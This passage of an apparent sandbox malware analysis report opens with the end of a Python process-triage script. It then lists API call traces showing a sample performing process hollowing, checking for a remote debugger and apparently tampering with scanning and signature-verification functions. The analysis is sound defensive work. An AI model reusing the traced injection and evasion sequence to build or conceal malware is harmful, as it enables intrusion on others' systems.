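    if rec.get("Has exited") == "false":
        findings.append("still running at end of analysis")
    return findings


def triage(text: str) -> Dict[int, List[str]]:
    """Map each Target ID to its list of findings (empty list means nothing flagged)."""
    return {int(r["Target ID"]): triage_process(r) for r in parse_process_table(text)}


if __name__ == "__main__":
    for target_id, findings in triage(PROCESS_TABLE).items():
        print(target_id, findings or ["no findings"])
```

The two .pif processes and the 665 MB apihost.exe are flagged; conhost.exe and dllhost.exe, which are the only system binaries in the subset, produce no findings. Pointing the script at a full report export only requires pasting more records into the same input shape.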


                                                                                                                                      Execution Graph

                                                                                                                                      Execution Coverage:13.9%
                                                                                                                                      Dynamic/Decrypted Code Coverage:100%
                                                                                                                                      Signature Coverage:10.4%
                                                                                                                                      Total number of Nodes:289
                                                                                                                                      Total number of Limit Nodes:15
[Execution graph: rendered interactively on the original page; the node and edge listing is omitted here. Windows API calls that appear as graph nodes: LocalAlloc, TlsSetValue, TlsGetValue, QueryPerformanceCounter, GetTickCount, InetIsOffline, LoadLibraryW, LoadLibraryA, LoadLibraryExA, FreeLibrary, GetModuleHandleW, GetModuleHandleA, GetProcAddress, NtWriteVirtualMemory, CharNextA, timeSetEvent, GetMessageA, TranslateMessage, DispatchMessageA, SysAllocStringLen, SysFreeString, SysReAllocStringLen, GetStdHandle, WriteFile, MessageBoxA, ExitProcess, GetModuleFileNameA, RegOpenKeyExA, RegQueryValueExA, RegCloseKey, lstrcpynA, lstrlenA, GetThreadLocale, GetLocaleInfoA, VirtualAlloc, VirtualFree, Sleep. Two paths are worth noting: 2c47d00 resolves its imports through 2c48020 and 2c480c8 (GetModuleHandleA, GetModuleHandleW, GetProcAddress) and then calls NtWriteVirtualMemory, which writes into another process; and 2c5c2fc installs a timer with timeSetEvent and then runs a GetMessageA/TranslateMessage/DispatchMessageA loop, so the payload work is driven from a timer callback rather than straight-line code. The helpers 2c31724 and 2c31a8c alternate VirtualAlloc/VirtualFree with Sleep calls.]

                                                                                                                                      Control-flow Graph

                                                                                                                                      • Executed
                                                                                                                                      • Not Executed
[Control-flow graph of the function at 2c48bb0: rendered interactively on the original page; the basic-block listing is omitted here and is cut off at the end of the extracted page. The blocks consist almost entirely of repeated calls to the string and allocation helpers 2c3480c, 2c3494c, 2c346a4, 2c34798 and 2c48824 (the last resolves an API via LoadLibraryA and FreeLibrary in the execution graph), interleaved with the direct Windows API calls GetThreadContext, SetThreadContext and NtResumeThread and two calls to 2c47d00, which the execution graph shows ending in NtWriteVirtualMemory. Read in order, that is read the thread context, write the target process, replace the context, resume the thread: the process hollowing sequence.]
2c3494c call 2c34798 call 2c3494c call 2c487a0 * 5 call 2c3480c call 2c3494c call 2c34798 call 2c3494c call 2c487a0 call 2c3480c call 2c3494c call 2c34798 call 2c3494c call 2c487a0 call 2c3480c call 2c3494c call 2c34798 call 2c3494c call 2c487a0 call 2c3480c call 2c3494c call 2c34798 call 2c3494c call 2c487a0 call 2c47ed4 call 2c487a0 * 2 7350->7575 7575->6830
APIs
  • Part of subcall function 02C48824: LoadLibraryA.KERNEL32(00000000,00000000,02C4890B), ref: 02C48858
  • Part of subcall function 02C48824: FreeLibrary.KERNEL32(74F60000,00000000,02C91388,Function_000065D8,00000004,02C91398,02C91388,05F5E0FF,00000040,02C9139C,74F60000,00000000,00000000,00000000,00000000,02C4890B), ref: 02C488EB
  • Part of subcall function 02C485DC: CreateProcessAsUserW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00000000,Kernel32,00000000,00000000,00000000), ref: 02C48668
• GetThreadContext.KERNEL32(00000884,02C91420,ScanString,02C913A4,02C4A77C,UacInitialize,02C913A4,02C4A77C,ScanBuffer,02C913A4,02C4A77C,ScanBuffer,02C913A4,02C4A77C,UacInitialize,02C913A4), ref: 02C49442
  • Part of subcall function 02C48254: NtReadVirtualMemory.NTDLL(?,?,?,?,?), ref: 02C482C5
  • Part of subcall function 02C484C4: NtUnmapViewOfSection.NTDLL(?,?), ref: 02C48529
  • Part of subcall function 02C479B4: NtAllocateVirtualMemory.NTDLL(?,?,00000000,?,?,?), ref: 02C47A27
  • Part of subcall function 02C47D00: NtWriteVirtualMemory.NTDLL(?,?,?,?,?), ref: 02C47D74
• SetThreadContext.KERNEL32(00000884,02C91420,ScanBuffer,02C913A4,02C4A77C,ScanString,02C913A4,02C4A77C,Initialize,02C913A4,02C4A77C,00000868,002FAFF8,02C914F8,00000004,02C914FC), ref: 02C4A157
• NtResumeThread.C:\WINDOWS\SYSTEM32\NTDLL(00000884,00000000,00000884,02C91420,ScanBuffer,02C913A4,02C4A77C,ScanString,02C913A4,02C4A77C,Initialize,02C913A4,02C4A77C,00000868,002FAFF8,02C914F8), ref: 02C4A164
  • Part of subcall function 02C487A0: LoadLibraryW.KERNEL32(bcrypt,?,00000884,00000000,02C913A4,02C4A3C7,ScanString,02C913A4,02C4A77C,ScanBuffer,02C913A4,02C4A77C,Initialize,02C913A4,02C4A77C,UacScan), ref: 02C487B4
  • Part of subcall function 02C487A0: GetProcAddress.KERNEL32(00000000,BCryptVerifySignature), ref: 02C487CE
  • Part of subcall function 02C487A0: FreeLibrary.KERNEL32(00000000,00000000,BCryptVerifySignature,bcrypt,?,00000884,00000000,02C913A4,02C4A3C7,ScanString,02C913A4,02C4A77C,ScanBuffer,02C913A4,02C4A77C,Initialize), ref: 02C4880A
Strings
Memory Dump Source
• Source File: 00000006.00000002.2475914324.0000000002C31000.00000020.00001000.00020000.00000000.sdmp, Offset: 02C30000, based on PE: true
• Associated: 00000006.00000002.2475881149.0000000002C30000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000006.00000002.2476032008.0000000002C5D000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000006.00000002.2476032008.0000000002C8E000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000006.00000002.2476359468.0000000002C91000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000006.00000002.2476359468.0000000002D85000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000006.00000002.2476359468.0000000002D88000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_2c30000_x.jbxd
Similarity
• API ID: Library$MemoryThreadVirtual$ContextFreeLoad$AddressAllocateCreateProcProcessReadResumeSectionUnmapUserViewWrite
• String ID: BCryptQueryProviderRegistration$BCryptRegisterProvider$BCryptVerifySignature$I_QueryTagInformation$Initialize$MiniDumpReadDumpStream$MiniDumpWriteDump$NtOpenObjectAuditAlarm$NtOpenProcess$NtReadVirtualMemory$NtSetSecurityObject$OpenSession$SLGetLicenseInformation$ScanBuffer$ScanString$UacInitialize$UacScan$advapi32$bcrypt$dbgcore$ntdll$sppc
• API String ID: 1022112746-51457883
• Opcode ID: 81b23c65aea8020546dbc4a94c6b097426b7f6d40694db4bfb084e6308ae4020
• Instruction ID: 6030126a2874176fbc06cf04b8ae37fc07095c389c27cb2845dfaef2a4cddd0d
• Opcode Fuzzy Hash: 81b23c65aea8020546dbc4a94c6b097426b7f6d40694db4bfb084e6308ae4020
• Instruction Fuzzy Hash: 28E20B75A901189FDB26EB64CCA0FDF77BAAF89310F1049A1E009AB314DE30AE45DF51

Control-flow Graph

• Executed
• Not Executed
• Graph rendered as an image in the original report; the raw node listing (basic-block address ranges and internal call edges) is omitted here. Entry block: 2c48bae-2c48bb3. Windows API calls appearing in the graph: GetThreadContext, SetThreadContext, NtResumeThread.
APIs
  • Part of subcall function 02C48824: LoadLibraryA.KERNEL32(00000000,00000000,02C4890B), ref: 02C48858
  • Part of subcall function 02C48824: FreeLibrary.KERNEL32(74F60000,00000000,02C91388,Function_000065D8,00000004,02C91398,02C91388,05F5E0FF,00000040,02C9139C,74F60000,00000000,00000000,00000000,00000000,02C4890B), ref: 02C488EB
  • Part of subcall function 02C485DC: CreateProcessAsUserW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00000000,Kernel32,00000000,00000000,00000000), ref: 02C48668
• GetThreadContext.KERNEL32(00000884,02C91420,ScanString,02C913A4,02C4A77C,UacInitialize,02C913A4,02C4A77C,ScanBuffer,02C913A4,02C4A77C,ScanBuffer,02C913A4,02C4A77C,UacInitialize,02C913A4), ref: 02C49442
  • Part of subcall function 02C48254: NtReadVirtualMemory.NTDLL(?,?,?,?,?), ref: 02C482C5
  • Part of subcall function 02C484C4: NtUnmapViewOfSection.NTDLL(?,?), ref: 02C48529
  • Part of subcall function 02C479B4: NtAllocateVirtualMemory.NTDLL(?,?,00000000,?,?,?), ref: 02C47A27
Strings
Memory Dump Source
• Source File: 00000006.00000002.2475914324.0000000002C31000.00000020.00001000.00020000.00000000.sdmp, Offset: 02C30000, based on PE: true
• Associated: 00000006.00000002.2475881149.0000000002C30000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000006.00000002.2476032008.0000000002C5D000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000006.00000002.2476032008.0000000002C8E000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000006.00000002.2476359468.0000000002C91000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000006.00000002.2476359468.0000000002D85000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000006.00000002.2476359468.0000000002D88000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_2c30000_x.jbxd
Similarity
• API ID: LibraryMemoryVirtual$AllocateContextCreateFreeLoadProcessReadSectionThreadUnmapUserView
• String ID: BCryptQueryProviderRegistration$BCryptRegisterProvider$BCryptVerifySignature$I_QueryTagInformation$Initialize$MiniDumpReadDumpStream$MiniDumpWriteDump$NtOpenObjectAuditAlarm$NtOpenProcess$NtReadVirtualMemory$NtSetSecurityObject$OpenSession$SLGetLicenseInformation$ScanBuffer$ScanString$UacInitialize$UacScan$advapi32$bcrypt$dbgcore$ntdll$sppc
• API String ID: 4113022151-51457883
• Opcode ID: d400ca5288ecda265db4266ce13eee2214072b0e61758449569dcaa4c51f010b
• Instruction ID: 3e3d828b954d49e682ec22f393d6bc6c06179c123929b586c54ca415ba11816e
• Opcode Fuzzy Hash: d400ca5288ecda265db4266ce13eee2214072b0e61758449569dcaa4c51f010b
• Instruction Fuzzy Hash: 11E20B75A901189FDB26EB64CCA0FDF77BAAF89310F1049A1E009AB314DE30AE45DF51

Control-flow Graph

• Executed
• Not Executed
• Graph rendered as an image in the original report; the raw node listing (basic-block address ranges and edges) is omitted here. Entry block: 2c35a78-2c35ab9. Windows API calls appearing in the graph: GetModuleFileNameA, RegOpenKeyExA, RegQueryValueExA, RegCloseKey, lstrcpynA, GetThreadLocale, GetLocaleInfoA, lstrlenA, LoadLibraryExA.
APIs
• GetModuleFileNameA.KERNEL32(00000000,?,00000105,02C30000,02C5D790), ref: 02C35A94
• RegOpenKeyExA.ADVAPI32(80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105,02C30000,02C5D790), ref: 02C35AB2
• RegOpenKeyExA.ADVAPI32(80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105,02C30000,02C5D790), ref: 02C35AD0
• RegOpenKeyExA.ADVAPI32(80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000), ref: 02C35AEE
• RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,?,?,00000000,02C35B7D,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?), ref: 02C35B37
• RegQueryValueExA.ADVAPI32(?,02C35CE4,00000000,00000000,?,?,?,?,00000000,00000000,?,?,00000000,02C35B7D,?,80000001), ref: 02C35B55
• RegCloseKey.ADVAPI32(?,02C35B84,00000000,?,?,00000000,02C35B7D,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105), ref: 02C35B77
• lstrcpynA.KERNEL32(?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000), ref: 02C35B94
• GetThreadLocale.KERNEL32(00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?), ref: 02C35BA1
• GetLocaleInfoA.KERNEL32(00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019), ref: 02C35BA7
• lstrlenA.KERNEL32(?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000), ref: 02C35BD2
• lstrcpynA.KERNEL32(00000001,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?), ref: 02C35C19
• LoadLibraryExA.KERNEL32(?,00000000,00000002,00000001,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales), ref: 02C35C29
• lstrcpynA.KERNEL32(00000001,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?), ref: 02C35C51
• LoadLibraryExA.KERNEL32(?,00000000,00000002,00000001,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales), ref: 02C35C61
• lstrcpynA.KERNEL32(00000001,?,00000105,?,00000000,00000002,00000001,?,00000105,?,00000000,00000003,?,00000005,?,?), ref: 02C35C87
• LoadLibraryExA.KERNEL32(?,00000000,00000002,00000001,?,00000105,?,00000000,00000002,00000001,?,00000105,?,00000000,00000003,?), ref: 02C35C97
Strings
Memory Dump Source
• Source File: 00000006.00000002.2475914324.0000000002C31000.00000020.00001000.00020000.00000000.sdmp, Offset: 02C30000, based on PE: true
• Associated: 00000006.00000002.2475881149.0000000002C30000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000006.00000002.2476032008.0000000002C5D000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000006.00000002.2476032008.0000000002C8E000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000006.00000002.2476359468.0000000002C91000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                      • Associated: 00000006.00000002.2476359468.0000000002D85000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      • Associated: 00000006.00000002.2476359468.0000000002D88000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_6_2_2c30000_x.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: lstrcpyn$LibraryLoadOpen$LocaleQueryValue$CloseFileInfoModuleNameThreadlstrlen
                                                                                                                                      • String ID: Software\Borland\Delphi\Locales$Software\Borland\Locales
                                                                                                                                      • API String ID: 1759228003-2375825460
                                                                                                                                      • Opcode ID: 4eb4c7cb8503daae725996ffc278b6f5417df8013845581444f64269e4e34608
                                                                                                                                      • Instruction ID: f789ba5b90fe4a819989a88f134f18ee0187c592ad0e22b95f64ab39c135eacf
• Instruction Fuzzy Hash: 9A51A971A4024C7EFB26D6A4DC46FEF77BD9B0C784F8409A1AA04E6181D7B49B449FA0

Control-flow Graph

Basic blocks (node id: address range, API call):
• 10523: 2c487a0-2c487c5, LoadLibraryW
• 10524: 2c487c7-2c487df, GetProcAddress
• 10525: 2c4880f-2c48815
• 10526: 2c48804-2c4880a, FreeLibrary
• 10527: 2c487e1-2c48800, call 2c47d00
• 10530: 2c48802
Edges: 10523->10524, 10523->10525, 10524->10526, 10524->10527, 10526->10525, 10527->10526, 10527->10530, 10530->10526
APIs
• LoadLibraryW.KERNEL32(bcrypt,?,00000884,00000000,02C913A4,02C4A3C7,ScanString,02C913A4,02C4A77C,ScanBuffer,02C913A4,02C4A77C,Initialize,02C913A4,02C4A77C,UacScan), ref: 02C487B4
• GetProcAddress.KERNEL32(00000000,BCryptVerifySignature), ref: 02C487CE
• FreeLibrary.KERNEL32(00000000,00000000,BCryptVerifySignature,bcrypt,?,00000884,00000000,02C913A4,02C4A3C7,ScanString,02C913A4,02C4A77C,ScanBuffer,02C913A4,02C4A77C,Initialize), ref: 02C4880A
  • Part of subcall function 02C47D00: NtWriteVirtualMemory.NTDLL(?,?,?,?,?), ref: 02C47D74
Strings
Memory Dump Source
• Source File: 00000006.00000002.2475914324.0000000002C31000.00000020.00001000.00020000.00000000.sdmp, Offset: 02C30000, based on PE: true
• Associated: 00000006.00000002.2475881149.0000000002C30000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000006.00000002.2476032008.0000000002C5D000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000006.00000002.2476032008.0000000002C8E000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000006.00000002.2476359468.0000000002C91000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000006.00000002.2476359468.0000000002D85000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000006.00000002.2476359468.0000000002D88000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_2c30000_x.jbxd
Similarity
• API ID: Library$AddressFreeLoadMemoryProcVirtualWrite
• String ID: BCryptVerifySignature$bcrypt
• API String ID: 1002360270-4067648912
• Opcode ID: 9d03acdc166dafd9c1cb6b09cc831b57708f4c184c008b667eda2d96857cd389
• Instruction ID: 09c783728bac928814d8288a3b47583138a5d450b95877df9cea1602d352a6e4
• Instruction Fuzzy Hash: C3F04F71A81215FEEB119A68AC4EB7773BCB785359F180B79B10C87540CBF058508B50

Control-flow Graph

Basic blocks (node id: address range, API call):
• 10540: 2c4ebf0-2c4ec0a, GetModuleHandleW
• 10541: 2c4ec36-2c4ec3e
• 10542: 2c4ec0c-2c4ec1e, GetProcAddress
• 10543: 2c4ec20-2c4ec30, CheckRemoteDebuggerPresent
• 10544: 2c4ec32
Edges: 10540->10541, 10540->10542, 10542->10541, 10542->10543, 10543->10541, 10543->10544, 10544->10541
APIs
• GetModuleHandleW.KERNEL32(KernelBase), ref: 02C4EC00
• GetProcAddress.KERNEL32(00000000,CheckRemoteDebuggerPresent), ref: 02C4EC12
• CheckRemoteDebuggerPresent.KERNEL32(FFFFFFFF,?,00000000,CheckRemoteDebuggerPresent,KernelBase), ref: 02C4EC29
Strings
Memory Dump Source
• Source File: 00000006.00000002.2475914324.0000000002C31000.00000020.00001000.00020000.00000000.sdmp, Offset: 02C30000, based on PE: true
• Associated: 00000006.00000002.2475881149.0000000002C30000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000006.00000002.2476032008.0000000002C5D000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000006.00000002.2476032008.0000000002C8E000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000006.00000002.2476359468.0000000002C91000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000006.00000002.2476359468.0000000002D85000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000006.00000002.2476359468.0000000002D88000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_2c30000_x.jbxd
Similarity
• API ID: AddressCheckDebuggerHandleModulePresentProcRemote
• String ID: CheckRemoteDebuggerPresent$KernelBase
• API String ID: 35162468-539270669
• Opcode ID: fed6c59af2203d7c7cebfe5504eac97ab999663298c920ffe396af766c6c1c0a
• Instruction ID: e5084263d86b7fc952452a445e5dc286576a1f41ca92d157193c9bd63852c04a
• Instruction Fuzzy Hash: 65F0A07090465CBAEB22A7A888897DEFBBD7B05328F640BA4E424621D1EB750784C655

Control-flow Graph

APIs
  • Part of subcall function 02C34ECC: SysAllocStringLen.OLEAUT32(?,?), ref: 02C34EDA
• RtlDosPa.N(00000000,?,00000000,00000000,00000000,02C4DC80), ref: 02C4DBEB
• NtOpenFile.N(?,00100001,?,?,00000001,00000020,00000000,?,00000000,00000000,00000000,02C4DC80), ref: 02C4DC1B
• NtQueryInformationFile.N(?,?,?,00000018,00000005,?,00100001,?,?,00000001,00000020,00000000,?,00000000,00000000,00000000), ref: 02C4DC30
• NtReadFile.N(?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,?,?,00000018,00000005,?,00100001), ref: 02C4DC5C
• NtClose.N(?,?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,?,?,00000018,00000005,?), ref: 02C4DC65
  • Part of subcall function 02C34C0C: SysFreeString.OLEAUT32(02C4E950), ref: 02C34C1A
Memory Dump Source
• Source File: 00000006.00000002.2475914324.0000000002C31000.00000020.00001000.00020000.00000000.sdmp, Offset: 02C30000, based on PE: true
• Associated: 00000006.00000002.2475881149.0000000002C30000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000006.00000002.2476032008.0000000002C5D000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000006.00000002.2476032008.0000000002C8E000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000006.00000002.2476359468.0000000002C91000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000006.00000002.2476359468.0000000002D85000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000006.00000002.2476359468.0000000002D88000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_2c30000_x.jbxd
Similarity
• API ID: File$String$AllocCloseFreeInformationOpenQueryRead
• String ID:
• API String ID: 2659941336-0
• Opcode ID: ef91da38ce04291ea29f9f5432b3716266ad94f47ce864d23bcebf20e95a1b55
• Instruction ID: 4c6d5d8a59f33941f64bfde14799a72790af43f64f775e65b73d9151d8e5d955
• Instruction Fuzzy Hash: DE21D071A50708BAEB15EAE4CC46FDFB7BDAF48B00F500561B601F71C0DAB4AA449BA5

Control-flow Graph

APIs
• InternetCheckConnectionA.WININET(00000000,00000001,00000000), ref: 02C4E436
Strings
Memory Dump Source
• Source File: 00000006.00000002.2475914324.0000000002C31000.00000020.00001000.00020000.00000000.sdmp, Offset: 02C30000, based on PE: true
• Associated: 00000006.00000002.2475881149.0000000002C30000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000006.00000002.2476032008.0000000002C5D000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000006.00000002.2476032008.0000000002C8E000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000006.00000002.2476359468.0000000002C91000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000006.00000002.2476359468.0000000002D85000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000006.00000002.2476359468.0000000002D88000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_2c30000_x.jbxd
Similarity
• API ID: CheckConnectionInternet
• String ID: Initialize$OpenSession$ScanBuffer
• API String ID: 3847983778-3852638603
• Opcode ID: 147b82e340d28890f673bda6acb6aa115fe649be682b09c9d7aef8deb58de219
• Instruction ID: 8529cd31d9ac9feb95403e219b2fb9f3dde7fb8b6b2278dbeb52e97f6fa6da1d
• Instruction Fuzzy Hash: AD41ED75A502089BEB26EBE4DC41ADEB3FAFF8C720F614835E441A7250DA74AD059F60

Control-flow Graph

APIs
  • Part of subcall function 02C34ECC: SysAllocStringLen.OLEAUT32(?,?), ref: 02C34EDA
• RtlDosPa.N(00000000,?,00000000,00000000,00000000,02C4DB9E), ref: 02C4DB0B
• NtCreateFile.N(?,00100002,?,?,00000000,00000000,00000001,00000002,00000020,00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 02C4DB45
• NtWriteFile.N(?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,00100002,?,?,00000000,00000000,00000001), ref: 02C4DB72
• NtClose.N(?,?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,00100002,?,?,00000000,00000000), ref: 02C4DB7B
Memory Dump Source
• Source File: 00000006.00000002.2475914324.0000000002C31000.00000020.00001000.00020000.00000000.sdmp, Offset: 02C30000, based on PE: true
• Associated: 00000006.00000002.2475881149.0000000002C30000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000006.00000002.2476032008.0000000002C5D000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000006.00000002.2476032008.0000000002C8E000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000006.00000002.2476359468.0000000002C91000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000006.00000002.2476359468.0000000002D85000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000006.00000002.2476359468.0000000002D88000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_2c30000_x.jbxd
Similarity
• API ID: File$AllocCloseCreateStringWrite
• String ID:
• API String ID: 3308905243-0
• Opcode ID: eedaff43223b06e837f8b72dc20890a9e686efe28aa4670b0190fec40f76fe18
• Instruction ID: 4ca3a90be2e67ffe609b6a823fec9372ad4f621d51a9607d51e263b76968e256
• Instruction Fuzzy Hash: 9221ED71A40308BAEB25EAE4CC46F9EB7BDAB04B14F504561B601F71C0DBB0AE049A65

Control-flow Graph

APIs
  • Part of subcall function 02C48020: GetModuleHandleA.KERNEL32(KernelBASE,00000000,00000000,02C48090,?,?,00000000,?,02C47A06,ntdll,00000000,00000000,02C47A4B,?,?,00000000), ref: 02C4805E
  • Part of subcall function 02C48020: GetModuleHandleA.KERNELBASE(?), ref: 02C48072
  • Part of subcall function 02C480C8: GetModuleHandleW.KERNEL32(Kernel32,00000000,00000000,02C48150,?,?,00000000,00000000,?,02C48069,00000000,KernelBASE,00000000,00000000,02C48090), ref: 02C48115
  • Part of subcall function 02C480C8: GetProcAddress.KERNEL32(00000000,Kernel32), ref: 02C4811B
  • Part of subcall function 02C480C8: GetProcAddress.KERNEL32(?,?), ref: 02C4812D
• CreateProcessAsUserW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00000000,Kernel32,00000000,00000000,00000000), ref: 02C48668
Strings
Memory Dump Source
• Source File: 00000006.00000002.2475914324.0000000002C31000.00000020.00001000.00020000.00000000.sdmp, Offset: 02C30000, based on PE: true
                                                                                                                                      • Associated: 00000006.00000002.2475881149.0000000002C30000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      • Associated: 00000006.00000002.2476032008.0000000002C5D000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      • Associated: 00000006.00000002.2476032008.0000000002C8E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      • Associated: 00000006.00000002.2476359468.0000000002C91000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      • Associated: 00000006.00000002.2476359468.0000000002D85000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      • Associated: 00000006.00000002.2476359468.0000000002D88000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_6_2_2c30000_x.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: HandleModule$AddressProc$CreateProcessUser
                                                                                                                                      • String ID: CreateProcessAsUserW$Kernel32
                                                                                                                                      • API String ID: 3130163322-2353454454
                                                                                                                                      • Opcode ID: 316376d45e902c080af4b5029e22c8f530245e149aa2b35dd7fcab68ad1df924
                                                                                                                                      • Instruction ID: eb62d5d81219c18ab8eae80b9bbf703efa223282ba46a9dcfdb93b9fa2063f03
                                                                                                                                      • Opcode Fuzzy Hash: 316376d45e902c080af4b5029e22c8f530245e149aa2b35dd7fcab68ad1df924
                                                                                                                                      • Instruction Fuzzy Hash: C411D3B6600208AFEB91EEA8DD41FDF37EDEB0C710F554620BA08D7640CA74E9109B64
                                                                                                                                      APIs
                                                                                                                                        • Part of subcall function 02C48020: GetModuleHandleA.KERNEL32(KernelBASE,00000000,00000000,02C48090,?,?,00000000,?,02C47A06,ntdll,00000000,00000000,02C47A4B,?,?,00000000), ref: 02C4805E
                                                                                                                                        • Part of subcall function 02C48020: GetModuleHandleA.KERNELBASE(?), ref: 02C48072
                                                                                                                                        • Part of subcall function 02C480C8: GetModuleHandleW.KERNEL32(Kernel32,00000000,00000000,02C48150,?,?,00000000,00000000,?,02C48069,00000000,KernelBASE,00000000,00000000,02C48090), ref: 02C48115
                                                                                                                                        • Part of subcall function 02C480C8: GetProcAddress.KERNEL32(00000000,Kernel32), ref: 02C4811B
                                                                                                                                        • Part of subcall function 02C480C8: GetProcAddress.KERNEL32(?,?), ref: 02C4812D
                                                                                                                                      • NtAllocateVirtualMemory.NTDLL(?,?,00000000,?,?,?), ref: 02C47A27
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000006.00000002.2475914324.0000000002C31000.00000020.00001000.00020000.00000000.sdmp, Offset: 02C30000, based on PE: true
                                                                                                                                      • Associated: 00000006.00000002.2475881149.0000000002C30000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      • Associated: 00000006.00000002.2476032008.0000000002C5D000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      • Associated: 00000006.00000002.2476032008.0000000002C8E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      • Associated: 00000006.00000002.2476359468.0000000002C91000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      • Associated: 00000006.00000002.2476359468.0000000002D85000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      • Associated: 00000006.00000002.2476359468.0000000002D88000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_6_2_2c30000_x.jbxd
                                                                                                                                      Similarity
